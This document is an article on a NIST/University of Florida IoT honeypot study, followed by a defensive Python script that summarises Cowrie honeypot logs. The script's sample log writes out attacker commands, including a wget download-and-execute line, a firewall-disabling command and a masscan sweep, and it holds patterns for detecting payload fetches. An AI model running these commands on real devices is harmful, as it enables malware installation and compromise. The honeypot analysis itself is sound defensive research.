A three-year honeypot experiment using emulated low-interaction IoT devices of various types, deployed in a range of locations, sheds light on what attackers are after when they target particular devices. The honeypot ecosystem was designed to be diverse enough to draw a broad range of traffic, and the collected data was clustered so that the attackers' goals could be inferred.
IoT (Internet of Things) devices, which include small internet-connected gadgets such as cameras, lights, doorbells, smart TVs, motion sensors, speakers and thermostats, are a fast-growing market. More than 40 billion of them are expected to be connected to the Internet by 2025, each one a potential network entry point or a source of processing power that can be abused for illicit cryptocurrency mining or recruited into DDoS botnets.
The honeypot ecosystem set up by researchers at NIST and the University of Florida had three components: server farms, a vetting system, and data collection and processing infrastructure. To build a varied ecosystem, the researchers used the off-the-shelf IoT honeypot emulators Cowrie, Dionaea, KFSensor and HoneyCamera.
The researchers crafted the fake instances so that on Censys and Shodan, two specialized search engines that index internet-connected services, they appeared to be real devices. The three primary types of honeypot were:
- HoneyShell – emulating BusyBox
- HoneyWindowsBox – emulating IoT devices running Windows
- HoneyCamera – emulating IP cameras from D-Link, Hikvision and other vendors
A distinctive aspect of this experiment was that the honeypots were adapted over time in response to attacker traffic and attack strategies. The researchers used the collected data to change the IoT configuration and defences, then gathered new data to capture how the actors reacted.
The experiment yielded data from 22.6 million hits, most of them directed at the HoneyShell honeypot. The various actors used similar attack methods, since their goals, and their means of achieving them, were largely the same.
Most actors, for example, ran tools such as "masscan" to scan for open ports and issued "/etc/init.d/iptables stop" to disable the firewall. Many also ran "free -m", "lspci | grep VGA" and "cat /proc/cpuinfo", which report the device's memory, PCI devices (including any GPU) and CPU respectively; all three are aimed at gathering hardware information about the target device.
Interestingly, roughly a million hits tried the username/password combination "admin" / "1234", which shows how heavily these default credentials are reused across IoT devices. In terms of end goals, the HoneyShell and HoneyCamera honeypots were mostly used for DDoS recruitment and were frequently infected with a Mirai variant or a coin miner.
On the Windows honeypot, coin-miner infections were the most prevalent, followed by viruses, droppers and trojans. In HoneyCamera's case, the researchers deliberately introduced a vulnerability that reveals credentials, and found that 29 attackers exploited it manually.
“Only 314,112 (13%) unique sessions were detected with at least one successful command execution inside the honeypots,” the research paper notes. “This result indicates that only a small portion of the attacks executed their next step, and the rest (87%) solely tried to find the correct username/password combination.”
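The three measurements the article reports (which credential pairs are guessed most, what the post-login commands are trying to do, and what fraction of sessions get past the login stage at all) are exactly what a practitioner would compute from their own honeypot logs. The following is an added example, not code from the study or from the Cowrie project: it takes a handful of constructed log lines written in Cowrie's JSON event format (`eventid`, `session`, `username`, `password`, `input` fields), counts guessed credential pairs, splits each shell line into individual commands, tags them with a coarse tactic using assumed, hand-written patterns, and reports how many sessions executed at least one command. The tactic names and patterns are this example's own choices, not a taxonomy from the paper.

```python
"""Triage Cowrie-style honeypot logs: most-guessed credentials, what the
executed commands were trying to do, and how many sessions got past login."""
import json
import re
from collections import Counter

# Constructed sample in Cowrie's JSON event format (illustrative only; not data
# from the NIST/University of Florida study). IPs are RFC 5737 documentation ranges.
SAMPLE_LOG = r"""
{"eventid":"cowrie.session.connect","session":"s1","src_ip":"198.51.100.7"}
{"eventid":"cowrie.login.failed","session":"s1","username":"root","password":"root"}
{"eventid":"cowrie.login.success","session":"s1","username":"admin","password":"1234"}
{"eventid":"cowrie.command.input","session":"s1","input":"/etc/init.d/iptables stop"}
{"eventid":"cowrie.command.input","session":"s1","input":"cat /proc/cpuinfo"}
{"eventid":"cowrie.command.input","session":"s1","input":"lspci | grep VGA"}
{"eventid":"cowrie.session.connect","session":"s2","src_ip":"198.51.100.9"}
{"eventid":"cowrie.login.failed","session":"s2","username":"admin","password":"1234"}
{"eventid":"cowrie.login.failed","session":"s2","username":"admin","password":"admin"}
{"eventid":"cowrie.session.connect","session":"s3","src_ip":"203.0.113.44"}
{"eventid":"cowrie.login.success","session":"s3","username":"admin","password":"1234"}
{"eventid":"cowrie.command.input","session":"s3","input":"free -m; masscan -p23 10.0.0.0/8 --rate 1000"}
{"eventid":"cowrie.command.input","session":"s3","input":"cd /tmp; wget http://203.0.113.5/x86 -O .x; chmod +x .x; ./.x"}
{"eventid":"cowrie.session.connect","session":"s4","src_ip":"192.0.2.18"}
{"eventid":"cowrie.login.failed","session":"s4","username":"user","password":"user"}
"""

# Assumed tactic labels and patterns (this example's own, not the paper's).
# Checked in order; the first match wins.
TACTIC_PATTERNS = [
    ("defense_evasion", re.compile(r"iptables\s+(stop|-F)|ufw\s+disable")),
    ("hardware_recon",  re.compile(r"^(free|lspci|nproc|uname|lscpu)\b|/proc/(cpuinfo|meminfo)")),
    ("scanning",        re.compile(r"^(masscan|nmap|zmap)\b")),
    ("payload_fetch",   re.compile(r"^(wget|curl|tftp|ftpget)\b")),
]

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def split_commands(line):
    """Split a shell line on ';', '&&', '||' and '|' into individual commands."""
    parts = re.split(r"\s*(?:\|\||&&|;|\|)\s*", line)
    return [p for p in parts if p]


def classify(cmd):
    """Return the first tactic whose pattern matches the command, else 'other'."""
    for tactic, pattern in TACTIC_PATTERNS:
        if pattern.search(cmd):
            return tactic
    return "other"


def summarize(text):
    events = parse_events(text)
    sessions = {e["session"] for e in events}
    # A session counts as 'executed' if it sent at least one command after login.
    executed = {e["session"] for e in events if e["eventid"] == "cowrie.command.input"}
    creds = Counter((e["username"], e["password"])
                    for e in events if e["eventid"] in LOGIN_EVENTS)
    tactics = Counter()
    for e in events:
        if e["eventid"] == "cowrie.command.input":
            for cmd in split_commands(e["input"]):
                tactics[classify(cmd)] += 1
    return {
        "sessions": len(sessions),
        "sessions_with_exec": len(executed),
        "exec_fraction": len(executed) / len(sessions) if sessions else 0.0,
        "top_credentials": creds.most_common(3),
        "tactics": tactics,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print(f"sessions: {report['sessions']}, with command execution: "
          f"{report['sessions_with_exec']} ({report['exec_fraction']:.0%})")
    print("top credentials:", report["top_credentials"])
    print("tactics:", dict(report["tactics"]))
```

Splitting on shell separators matters: an attacker's single input line such as `free -m; masscan ...` carries two different intentions, and counting the line once would hide the scan. On real Cowrie output the same functions apply unchanged to the `cowrie.json` file, one event per line.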